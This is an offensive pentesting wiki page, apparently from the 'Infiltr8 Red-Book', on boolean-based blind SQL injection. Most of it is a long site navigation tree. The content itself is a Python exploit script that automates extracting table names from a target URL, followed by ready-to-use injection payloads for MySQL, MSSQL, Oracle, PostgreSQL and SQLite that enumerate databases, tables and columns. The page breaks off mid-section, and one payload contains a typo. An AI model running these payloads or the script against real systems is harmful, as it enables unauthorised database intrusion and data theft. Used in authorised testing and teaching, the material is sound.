Infiltr8: The Red-Book
Infiltr8ForumGitHub
  • The Red-Book
  • Red-Teaming
    • Reconnaissance
      • DNS Enumeration
      • Subdomains enumeration
      • Email Harvesting
      • Host Discovery
      • TCP/UDP Service Scanning
      • Vulnerability Scanning
      • Google Dorks
      • GitHub Recon
      • Files Metadata
      • 🛠️Maltego
      • 🛠️Specialized Search Engines
    • Execution
      • Code & Process Injection
        • Loading .NET Reflective Assembly
        • Loading .NET Assembly from Windows Script Hosting
        • Process Hollowing
        • WndProc Callback Shellcode Execution
        • Fibers Shellcode Execution
        • Vector Exception Handler Shellcode Execution
        • NtQueueApcThread & NtTestAlert Shellcode Execution
        • Thread Pool Callback Shellcode Execution
        • Module Stomping Shellcode Injection
        • Remote .NET Assembly Loading through WaaSRemediation DCOM Abuse
        • 🛠️DLL Injection
        • 🛠️CreateRemoteThread Injection
        • 🛠️Reflective DLL Injection
        • 🛠️NtMapViewOfSection Injection
        • 🛠️SetWindowHookEx Injection
        • 🛠️PoolParty
        • 🛠️MockingJay
      • Code Execution
        • CMSTP
        • MSBuild
        • MSHTA
        • Microsoft Office Execution
        • Windows Script Host (WSH)
        • Outlook Home Page Abuse (Specula)
        • Powershell Without Powershell.exe
        • RegSrv32
        • Scheduled Tasks
        • Services
        • Windows Library Files
        • HTML Help Files
        • WMI
        • Script Exploits
        • 🛠️Sliver
    • Initial Access
      • Network Services
      • Password Attacks
      • Phishing
        • HTML Smuggling
        • Phishing with Calendars (.ICS Files)
        • Phishing With Microsoft Office
          • MS Office - VBA (Macros)
          • MS Office - RTF Files RCE
          • MS Office - Custom XML parts
          • 🛠️MS Office - Excel 4.0 (XLM) Macros
          • 🛠️MS Office - VBA Stomping
          • 🛠️MS Office - Remote Dotm Template Injection
        • 🛠️Phishing via Proxy
          • Adversary in the Middle (AitM) Phishing
            • EvilGoPhish
            • Evilginx
            • Muraena
            • Modlishka
          • Browser in the Middle (BitM) Phishing
            • cuddlephish
            • EvilnoVNC
    • Persistence
      • Active Directory
      • Windows
        • Accessibility features Backdoor
        • AEDebug Keys Persistence
        • Image File Execution Options (IFEO) Persistence
        • Logon Triggered Persistence
        • LSA Persistence
          • Security Support Provider DLLs
          • Authentication Package
        • Natural Language 6 DLLs Persistence
        • Run Keys Persistence
        • Winlogon Persistence
        • WMI Event Subscription Persistence
      • Linux
        • SSH for Persistence
        • GSocket for Persistence
        • 🛠️Udev rules
    • Defense Evasion
      • Endpoint Detection Respons (EDR) Bypass
        • Bring Your Own Vulnerable Driver (BYOVD)
        • Safe Mode With Networking
        • Windows Defender Application Control (WDAC): Killing EDR
        • 🛠️Load Unsigned Drivers
        • 🛠️Minifilter Altitude
        • 🛠️Hypervisor Code Integrity (HVCI) Disallowed Images
        • 🛠️Windows Filtering Platform (WFP)
        • 🛠️Userland Hooking Bypass
      • UAC Bypass
      • AMSI Bypass
      • ETW evasion
      • Living Off The Land
        • Windows Sysinternals
        • LOLBAS Project
        • File Operations
        • File Executions
      • Signature Evasion
      • Obfuscation
        • PowerShell Obfuscation
        • 🛠️Commandline Obfusaction
        • 🛠️PE Obfuscation
        • 🛠️String Encryption
      • AppLocker Bypass
      • Mark-of-the-Web (MotW) Bypass
      • 🛠️PowerShell Constrained Language Mode (CLM) Bypass
      • 🛠️Kill Windows Defender
      • 🛠️Virtualization-based security (VBS) Bypass
        • 🛠️Credential Guard bypass
        • 🛠️hypervisor-protected code integrity (HVCI) Bypass
        • 🛠️Windows Defender Application Control (WDAC) Bypass
      • 🛠️Sandbox Evasion
    • Discovery
      • Active Directory
      • Windows
        • System Information
        • Processes & Services
        • Scheduled Tasks
        • Installed applications
        • Network Configuration
        • FIle/Folder ACLs
        • Knowing your Shell
        • Security Solutions
      • Linux
        • OS Details
        • 🛠️Process & Services
    • Privilege Escalation
      • Windows
        • Tools ⚙️
        • PowerShell Logging
        • Credentials In Files
        • Abusing Tokens
        • Insecure Services
          • Weak Service Permissions
          • Weak File/Folder Permissions
          • Weak Registry Permissions
          • Unquoted Service Path
        • AlwaysInstallElevated
        • AutoLogon Registry
        • Insecure Scheduled Tasks
          • Weak File/Folder Permissions
        • 🛠️DLL Hijacking
      • Linux
        • Kernel Exploits
          • OverlayFs Exploits
            • GameOverlayFs
            • CVE-2023-0386
            • CVE-2021-3493
          • CVE-2023-32233 (CAP_NET_ADMIN)
          • Dirty Pipe
          • 🛠️DirtyCow
          • 🛠️RDS
          • 🛠️Full Nelson
          • 🛠️Mempodipper
        • GLIBC Exploits
          • Looney Tunables
        • Polkit Exploits
          • PwnKit
          • D-Bus Authentication Bypass
        • Sudo Exploits
          • Sudo Binaries
          • Sudo Misconfigurations
          • Reuse Sudo Tokens
          • User Restriction Bypass
          • Pwfeedback BOF
          • Baron Samedit
          • Sudoedit Bypass
        • SUID Binaries
        • Script Exploits
          • Python
            • Pip Download Code Execution
            • PyInstaller Code Execution
            • Pytorch Models/PTH Files Code Execution
          • Ruby
          • Bash
          • Perl
        • Scheduled tasks
          • Cron Jobs
          • Systemd timers
        • Interesting Groups
          • Lxd
        • Capabilities
        • NFS no_root_squash/no_all_squash
        • Linux Active Directory
    • Credential Access
      • Password Stores
        • Windows Credential Manager
        • KeePass
        • Web Browsers
      • Unsecured Credentials
        • Credentials In Files
        • VNC Config
        • SSH Private Keys
        • Git Repositories
        • Veeam Backup
        • Network shares
        • Network protocols
      • OS Credentials
        • Windows & Active Directory
          • SAM & LSA secrets
          • DPAPI secrets
          • NTDS secrets
          • LSASS secrets
          • DCSync
          • Kerberos key list
          • Group Policy Preferences
          • AutoLogon Registry
          • In-memory secrets
          • Cached Kerberos tickets
        • Linux
          • Shadow File
          • In-memory secrets
          • Linux Cached Kerberos tickets
      • MITM and coerced auths
      • Password Attacks
        • Default, weak & Leaked Passwords
        • Generate Wordlists
        • Brute-Force
          • Online - Attacking Services
          • Offline - Password Cracking
      • Impersonation
    • Lateral Movement
      • Port Forwarding
      • TLS Tunneling (Ligolo-ng)
      • HTTP(s) Tunneling
      • SSH Tunneling
      • DNS Tunneling
      • SMB-based
      • WinRM
      • Remote WMI
      • DCOM
      • Scheduled Tasks (ATSVC)
      • Services (SVCCTL)
    • Exfiltration
      • Exfiltration over ICMP
      • Exfiltration Over DNS
      • Exfiltration Over HTTP(s)
      • Exfiltration Over SMB
  • Web Pentesting
    • Reconnaissance
      • Subdomains enumeration
      • WAF Enumeration
    • Infrastructures
      • DBMS
        • Enum Databases
        • Read/Write/Execute
      • DNS
        • Subdomain Takeover
      • Web Servers
        • Nginx
        • Apache
          • Apache Commons Text
          • Apache Tomcat
      • CMS
        • Wordpress
        • 🛠️Joomla
        • 🛠️Drupal
        • 🛠️Bolt CMS
      • Frameworks
        • Spring Framework
          • Spring Routing Abuse
          • Spring Boot Actuators
          • Spring View Manipulation
        • Werkzeug
        • 🛠️Django
        • 🛠️Flask
        • 🛠️Laravel
      • CGI
    • Web Vulnerabilities
      • Server-Side
        • NoSQL Injection
        • SQL Injection
          • UNION Attacks
          • Blind Attacks
            • Boolean Based
            • Time Based
            • Error Based
        • Insecure Deserialization
          • .NET Deserialization
          • Python Deserialization
          • PHP Deserialization
          • 🛠️Java Deserialization
          • 🛠️Ruby Deserialization
        • File Inclusion & Path Traversal
          • LFI to RCE
            • PHP Wrappers
            • Logs Poisoning
            • /proc
            • PHPInfo
            • PHP Sessions
            • Segmentation Fault
          • RFI to RCE
        • Command Injection
        • Brute-Force
        • SSTI (Server-Side Template Injection)
        • Exposed Git Repositories
        • 🛠️File Upload
      • Client-Side
        • XSS (Cross-Site Scripting)
        • CORS (Cross-origin resource sharing)
  • Network Pentesting
    • Network services
      • DNS
      • FastCGI
      • HTTP & HTTPS
      • LDAP
      • NFS
      • MS-RPC
      • MSSQL
      • NBT-NS (NetBIOS)
      • Oracle TNS
      • RDP
      • Rsync
      • SMB
      • SMTP
      • SNMP
      • SSH
      • WebDAV
      • WinRM
      • XMPP/Jabber
      • 🛠️RPC Port Mapper
      • 🛠️FTP
      • 🛠️Telnet
      • 🛠️MySQL
    • WiFi
      • 🛠️WEP
      • 🛠️WPA2
      • 🛠️WPS
    • Bluetooth
  • Active Directory Pentesting
    • Reconnaissance
      • Tools ⚙️
        • PowerView ⚙️
        • Responder ⚙️
        • BloodHound ⚙️
        • enum4linux ⚙️
      • Network
        • DHCP
        • DNS
        • NBT-NS
        • Port scanning
        • SMB
        • LDAP
        • MS-RPC
      • Objects & Settings
        • DACLs
        • Group policies
        • Password policy
        • LAPS
    • Movement
      • Credentials
        • Dumping
        • Cracking
        • Bruteforcing
          • Guessing
          • Spraying
          • Stuffing
        • Shuffling
      • MITM and coerced auths
        • ARP poisoning
        • DNS spoofing
        • DHCP poisoning
        • DHCPv6 spoofing
        • WSUS spoofing
        • LLMNR, NBT-NS, mDNS spoofing
        • ADIDNS poisoning
        • WPAD spoofing
        • MS-EFSR abuse (PetitPotam)
        • MS-RPRN abuse (PrinterBug)
        • MS-FSRVP abuse (ShadowCoerce)
        • MS-DFSNM abuse (DFSCoerce)
        • MS-EVEN abuse (CheeseOunce)
        • PushSubscription abuse
        • WebClient abuse (WebDAV)
        • Living off the land
        • 🛠️NBT Name Overwrite
        • 🛠️ICMP Redirect
      • NTLM
        • Capture
        • Relay
        • Pass the hash
      • Kerberos
        • Pre-auth bruteforce
        • Pass the key
        • Overpass the hash
        • Pass the ticket
        • Pass the cache
        • Forged tickets
          • Silver tickets
          • Golden tickets
          • Diamond tickets
          • Sapphire tickets
          • RODC Golden tickets
          • MS14-068
        • ASREQroast
        • ASREProast
        • Kerberoast
        • Delegations
          • (KUD) Unconstrained
          • (KCD) Constrained
          • (RBCD) Resource-based constrained
          • S4U2self abuse
          • Bronze Bit
        • Shadow Credentials
        • UnPAC the hash
        • Pass the Certificate - PKINIT
        • sAMAccountName spoofing
        • SPN-jacking
      • Netlogon
        • ZeroLogon
      • DACL abuse
        • AddMember
        • ForceChangePassword
        • Targeted Kerberoasting
        • WriteOwner
        • ReadLAPSPassword
        • ReadGMSAPassword
        • Grant ownership
        • Grant rights
        • Logon script
        • Rights on RODC object
      • Group policies
      • Trusts
      • Certificate Services (AD-CS)
        • Certificate templates
        • Certificate authority
        • Access controls
        • Unsigned endpoints
        • Certifried
      • Schannel
        • Pass the Certificate - Schannel
      • SCCM / MECM
        • Privilege Escalation
        • Post Exploitation
      • Exchange services
        • PrivExchange
        • ProxyLogon
        • ProxyShell
        • ProxyNotShell
      • Print Spooler Service
        • PrinterBug
        • PrintNightmare
      • Built-ins & settings
        • Builtin Groups
          • DNSAdmins
          • AD Recycle Bin
        • MachineAccountQuota
        • Pre-Windows 2000 computers
        • RODC
    • Persistence
      • Skeleton key
      • SID History
      • AdminSDHolder
      • GoldenGMSA
      • Kerberos
        • Forged tickets
        • Delegation to KRBTGT
      • Certificate Services (AD-CS)
        • Certificate authority
        • Access controls
        • Golden certificate
      • LAPS
      • 🛠️DC Shadow
      • 🛠️Access controls
  • 🛠️Cloud & CI/CD Pentesting
    • CI/CD
      • Ansible Pentesting
      • Artifactory Pentesting
      • Docker Registry
        • 🛠️HTTP API V2
      • 🛠️Kubernetes
      • 🛠️GitLab
      • 🛠️Github
      • 🛠️Gitea
      • 🛠️Jenkins
      • 🛠️Terraform
    • Azure Pentesting
      • Reconnaissance
        • Tools ⚙️
        • Unauthenticated Reconnaissance
        • Internal Reconnaissance
      • Movement
        • Credentials
          • Password Spraying
          • Token Manipulation
            • Pass-The-Cookie (PTC)
            • Pass the Certificate (Azure)
            • Pass the PRT
        • Aazure Resources
          • Key Vault
          • Storage Accounts
          • Virtual Machines
          • Automation
          • Databases
        • Role-Based Access
        • Conditional Access
        • Service Principals & Applications
        • Hybrid Identity
          • Password Hash Sync (PHS)
          • Pass-through Authentication (PTA)
          • Active Directory Federation Services (ADFS)
          • Seamless SSO
          • Cloud Kerberos Trust
        • Cross-Tenant Access
      • Persistence
    • GCP Pentesting
    • AWS Pentesting
  • 🛠️Smart Contracts Pentesting
    • Solidity
      • Vulnerabilities
        • Delegatecall Attack
        • Denial of Service Attack
        • Overflow & Underflow
        • Reentrancy Attack
        • Self Destruct Attack
        • Tx Origin Attack
Powered by GitBook
On this page
  • Theory
  • Practice
  • Resources

Was this helpful?

Edit on GitHub
  1. Web Pentesting
  2. Web Vulnerabilities
  3. Server-Side
  4. SQL Injection
  5. Blind Attacks

Boolean Based

Theory

Boolean-based SQL injection is a technique that relies on sending an SQL query to the database based on which the technique forces the application to return different results. The result allows an attacker to judge whether the payload used returns true or false. Even though no data from the database are recovered, the results give the attacker valuable information. Depending on the boolean result (TRUE or FALSE), the content within the response will change, or remain the same.

Practice

We can use a script (Python) similar to the one below, to automate the process of dumping the database trough blind SQLi.

Exploit Script Example
import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
import string


# Set the URL and other parameters
uri = "http://<TARGET>/search?id="
timeout = 5
retries = 3

# Create a session and attach the retry strategy to it
session = requests.Session()
retry_strategy = Retry(
    total=retries,
    backoff_factor=0.3,
    status_forcelist=[500, 502, 503, 504],
    connect=retries,
)
adapter = HTTPAdapter(max_retries=retry_strategy)
session.mount("http://", adapter)
session.mount("https://", adapter)

# Initialize variables
password = ""
table_id = 6
i = 1

printables = "azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789"
tries = 0 
while True:
    for char in string.printable[:-6]:
        if char not in ['*','+','.','?','|','&','$','\\','"','\'',"#"]:
        
            # Edit payload for what you need, this example dump Table Names on MySQL
            # Fore more payloads, check https://red.infiltr8.io/web-pentesting/web-vulnerabilities/server-side/sql-injection/blind-sqli/boolean-based  
            payload = f"2'AND+(SELECT+HEX(SUBSTRING(table_name,{i},1))FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+{table_id},1)=HEX('{char}')--+-"

            for _ in range(retries + 1):
                try:
                    # If needed replace here, how payload is sent
                    r = session.get(url=uri + payload, timeout=timeout)
                    r.raise_for_status()  # Raise an HTTPError for bad responses
                    
                    #print(r.request.url)
                    print(f"\r{password}                    {i}", end="")

                    if "Trying to access array offset on value of type" not in r.text:
                        password = password + char
                        i += 1
                    break  # Break out of the retry loop if the request is successful
                except requests.exceptions.RequestException as e:
                    print(f"Error making request: {e}")
                    if _ < retries:
                        print("Retrying...")
                        continue
                    else:
                        print("Request failed after retries.")
                        break

Getting database

First, retrieve the database length:

1' AND (SELECT LENGTH(database()))=1-- -  #False  
1' AND (SELECT LENGTH(database()))=2-- -  #False
1' AND (SELECT LENGTH(database()))=3-- -  #True -> length of database is 3 characters.

Second, retrieve the database name:

--True -> It means the first character is p.
1' AND (SELECT HEX(SUBSTRING(database(), 1, 1)))=HEX('p')-- -
1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))=112-- -  #ASCII code is in decimal

--True -> It means the second character is w.
1' AND (SELECT HEX(SUBSTRING(database(), 2, 1)))=HEX('w')-- -

--True -> It means the third character is n.
1' AND (SELECT HEX(SUBSTRING(database(), 3, 1)))=HEX('n')-- -

First, retrieve the database length:

1' AND (SELECT LEN(DB_NAME()))=1--  #False  
1' AND (SELECT LEN(DB_NAME()))=2--  #False
1' AND (SELECT LEN(DB_NAME()))=3--  #True -> It means the length of database is 3 characters.

Second, retrieve the database name:

--True -> It means the first character is p. Note that ASCII code is in decimal
1' AND (SELECT ASCII(SUBSTRING(DB_NAME(), 1, 1)))=112-- 

--True -> It means the second character is s.
1' AND (SELECT ASCII(SUBSTRING(DB_NAME(), 2, 1)))=115--

--True -> It means the third character is s.
1' AND (SELECT ASCII(SUBSTRING(DB_NAME(), 3, 1)))=115--

First, retrieve the database length:

1' AND (SELECT LENGTH(global_name) FROM global_name)=1--  #False  
1' AND (SELECT LENGTH(global_name) FROM global_name)=2--  #False
1' AND (SELECT LENGTH(global_name) FROM global_name)=3--  #True -> It means the length of database is 3 characters.

Second, retrieve the database name:

--True -> It means the first character is p. Note that ASCII code is in decimal
1' AND (SELECT ASCII(SUBSTR(global_name, 1, 1)) FROM global_name)=112-- 

--True -> It means the second character is s.
1' AND (SELECT ASCII(SUBSTR(global_name, 2, 1)) FROM global_name)=115--

--True -> It means the third character is s.
1' AND (SELECT ASCII(SUBSTR(global_name, 3, 1)) FROM global_name)=115--

First, retrieve the database length:

1' AND (SELECT LENGTH(current_database()))=1--  #False  
1' AND (SELECT LENGTH(current_database()))=2--  #False
1' AND (SELECT LENGTH(current_database()))=3--  #True -> It means the length of database is 3 characters.

Second, retrieve the database name:

--True -> It means the first character is p. Note that ASCII code is in decimal
1' AND (SELECT ASCII(SUBSTRING(current_database(), 1, 1)))=112-- 

--True -> It means the second character is s.
1' AND (SELECT ASCII(SUBSTRING(current_database(), 2, 1)))=115--

--True -> It means the third character is s.
1' AND (SELECT ASCII(SUBSTRING(current_database(), 3, 1)))=115--

Principal database is call main, but It's possible that multiple database file are open, you can find their name's lenght like this :

1' AND (SELECT LENGTH(name) FROM pragma_database_list LIMIT 1 OFFSET 0)=1--  #False  
1' AND (SELECT LENGTH(name) FROM pragma_database_list LIMIT 1 OFFSET 0)=2--  #False
1' AND (SELECT LENGTH(name) FROM pragma_database_list LIMIT 1 OFFSET 0)=3--  #True ->length of first database is 3 characters.

1' AND (SELECT LENGTH(name) FROM pragma_database_list LIMIT 1 OFFSET 1)=3--  #True -> It means the length of second database is 3 characters.

Second, retrieve the name of database:

--True -> It means the first character of second database's name is p.
1' AND (SELECT hex(substr(name,1,1)) FROM pragma_database_list LIMIT 1 OFFSET 1)=HEX('p')-- 

--True -> It means the second character is s.
1' AND (SELECT hex(substr(name,2,1)) FROM pragma_database_list LIMIT 1 OFFSET 1)=HEX('s')--

--True -> It means the third character is s.
1' AND (SELECT hex(substr(name,3,1)) FROM pragma_database_list LIMIT 1 OFFSET 1)=HEX('s')--

Getting Tables

First, retrieve the number of tables:

1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=2-- -  #True -> 2 tables

Second, retrieve length of each table

-- If True, the first table lenght is 5
1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=5-- - 

-- If True, the second table lenght is 5
1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)=5-- - 

Third, retrieve name of each table

-- If True, the first char of the first table is u
1'AND (SELECT HEX(SUBSTRING(table_name, 1, 1))FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=HEX('u')-- -

-- If True, the second char of the first table is s
1'AND (SELECT HEX(SUBSTRING(table_name, 2, 1)) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=HEX('s')-- -

-- If True, the first char of the second table is p
1'AND (SELECT HEX(SUBSTRING(table_name, 1, 1)) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)=HEX('p')-- -

First, retrieve the number of tables:

1' AND (SELECT count(*) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME())=2--  #True -> 2 tables
1' AND (SELECT count(*) FROM information_schema.tables)=2-- #Run in actual context/DB

Second, retrieve length of each table

-- If True, the first table lenght is 5
1' AND (SELECT TOP 1 LEN(table_name) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME())=5-- 

-- If True, the second table lenght is 5
1' AND (SELECT TOP 1 LEN(table_name) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME() AND table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))=5--

-- If True, the third table lenght is 5
1' AND (SELECT TOP 1 LEN(table_name) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME() AND table_name NOT IN(SELECT TOP 2 table_name FROM information_schema.tables))=5-- 

Third, retrieve name of each table

-- If True, the first char of the first table is u
1'AND (SELECT TOP 1 ASCII(SUBSTRING(table_name, 1, 1)) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME())=117--

-- If True, the second char of the first table is s
1'AND (SELECT TOP 1 ASCII(SUBSTRING(table_name, 2, 1)) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME())=115--

-- If True, the first char of the second table is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(table_name, 1, 1)) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME() AND table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))=112--

-- If True, the first char of the third table is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(table_name, 1, 1)) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME() AND table_name NOT IN(SELECT TOP 2 table_name FROM information_schema.tables))=112--

First, retrieve the number of tables:

1' AND (SELECT COUNT(*) FROM all_tables WHERE owner = USER)=2-- #True -> 2 tables

Second, retrieve length of each table

-- If True, the first table lenght is 5
1' AND (SELECT LENGTH(table_name) FROM all_tables WHERE owner = USER OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=5--

-- If True, the second table lenght is 5
1' AND (SELECT LENGTH(table_name) FROM all_tables WHERE owner = USER OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY)=5-- 

Third, retrieve name of each table

-- If True, the first char of the first table is u
1'AND (SELECT ASCII(SUBSTR(table_name, 1, 1)) FROM all_tables WHERE owner = USER OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=117--

-- If True, the second char of the first table is s
1'AND (SELECT ASCII(SUBSTR(table_name, 2, 1)) FROM all_tables WHERE owner = USER OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=115--

-- If True, the first char of the second table is p
1'AND (SELECT ASCII(SUBSTR(table_name, 1, 1)) FROM all_tables WHERE owner = USER OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY)=112--

First, retrieve the number of tables:

1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=current_database())=2-- #True -> 2 tables

Second, retrieve length of each table

-- If True, the first table lenght is 5
1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=current_database() LIMIT 0,1)=5--

-- If True, the second table lenght is 5
1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=current_database() LIMIT 1,1)=5-- 

Third, retrieve name of each table

-- If True, the first char of the first table is u
1'AND (SELECT ASCII(SUBSTRING(table_name, 1, 1))FROM information_schema.tables WHERE table_schema=current_database() LIMIT 0,1)=117--

-- If True, the second char of the first table is s
1'AND (SELECT ASCII(SUBSTRING(table_name, 2, 1)) FROM information_schema.tables WHERE table_schema=current_database() LIMIT 0,1)=115--

-- If True, the first char of the second table is p
1'AND (SELECT ASCII(SUBSTRING(table_name, 1, 1)) FROM nformation_schema.tables WHERE table_schema=current_database() LIMIT 1,1)=112--

First, retrieve the number of tables:

1' AND (SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%')=2-- #True -> 2 tables

Second, retrieve length of each table

-- If True, the first table lenght is 5
1' AND (SELECT LENGTH(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' LIMIT 1 OFFSET 0)=5--

-- If True, the second table lenght is 5
1' AND (SELECT LENGTH(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' LIMIT 1 OFFSET 1)=5-- 

Third, retrieve name of each table

-- If True, the first char of the first table is u
1'AND (SELECT HEX(SUBSTR(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' LIMIT 1 OFFSET 0)=HEX('u')--

-- If True, the second char of the first table is s
1'AND (SELECT HEX(SUBSTR(tbl_name,2,1)) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' LIMIT 1 OFFSET 0)=HEX('s')--

-- If True, the first char of the second table is p
1'AND (SELECT HEX(SUBSTR(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' LIMIT 1 OFFSET 1)=HEX('p')--

Getting Columns

First, retrieve the number of columns:

1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE')=2-- -  #True -> 2 columns

Second, retrieve length of each column

-- If True, the first column's name lenght is 3
1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE' LIMIT 0,1)=3-- - 

-- If True, the name of second column's lenght is 8
1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE' LIMIT 1,1)=8-- - 

Third, retrieve name of each column

-- If True, the first char of the first column is a
1'AND (SELECT HEX(SUBSTRING(column_name, 1, 1))FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE' LIMIT 0,1)=HEX('a')-- -

-- If True, the second char of the first column is b
1'AND (SELECT HEX(SUBSTRING(column_name, 2, 1))FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE' LIMIT 0,1)=HEX('b')-- -

-- If True, the first char of the second column is p
1'AND (SELECT HEX(SUBSTRING(column_name, 1, 1))FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE' LIMIT 1,1)=HEX('p')-- -

First, retrieve the number of columns:

1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE')=2--  #True -> 2 tables

Second, retrieve length of each columns

-- If True, the first column lenght is 5
1' AND (SELECT TOP 1 LEN(column_name) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE')=5-- 

-- If True, the second column lenght is 5
1' AND (SELECT TOP 1 LEN(column_name) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE' AND column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))=5--

-- If True, the third column lenght is 5
1' AND (SELECT TOP 1 LEN(column_name) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE' AND column_name NOT IN(SELECT TOP 2 column_name FROM information_schema.columns))=5-- 

Third, retrieve name of each columns

-- If True, the first char of the first column is a
1'AND (SELECT TOP 1 ASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE')=97--

-- If True, the second char of the first column is b
1'AND (SELECT TOP 1 ASCII(SUBSTRING(column_name, 2, 1)) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE')=98--

-- If True, the first char of the second column is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE' AND column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))=112--

-- If True, the first char of the third column is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE' AND column_name NOT IN(SELECT TOP 2 column_name FROM information_schema.columns))=112--

First, retrieve the number of columns:

1' AND (SELECT COUNT(column_name) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE')=2--  #True -> 2 columns

Second, retrieve length of each column

-- If True, the first column's name lenght is 3
1' AND (SELECT LENGTH(column_name) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE' OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=3-- 

-- If True, the second column's name lenght is 8
1' AND (SELECT LENGTH(column_name) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE' OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY)=8-- 

Third, retrieve name of each column

-- If True, the first char of the first column is a
1'AND (SELECT ASCII(SUBSTR(column_name, 1, 1)) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE' OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=97--

-- If True, the second char of the first column is b
1'AND (SELECT ASCII(SUBSTR(column_name, 2, 1)) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE' OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=98--

-- If True, the first char of the second column is p
1'AND (SELECT ASCII(SUBSTR(column_name, 1, 1)) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE' OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY)=112--

First, retrieve the number of columns:

1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE')=2--  #True -> 2 columns

Second, retrieve length of each column

-- If True, the first column's name lenght is 3
1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE' LIMIT 0,1)=3-- 

-- If True, the second column's name lenght is 8
1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE' LIMIT 1,1)=8-- 

Third, retrieve name of each column

-- If True, the first char of the first column is a
1'AND (SELECT ASCII(SUBSTRING(column_name, 1, 1))FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE' LIMIT 0,1)=97--

-- If True, the second char of the first column is b
1'AND (SELECT ASCII(SUBSTRING(column_name, 2, 1))FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE' LIMIT 0,1)=98--

-- If True, the first char of the second column is p
1'AND (SELECT ASCII(SUBSTRING(column_name, 1, 1))FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE' LIMIT 1,1)=112--

We can send the following queries to retrieve it

-- If True, the first char of sql field is C
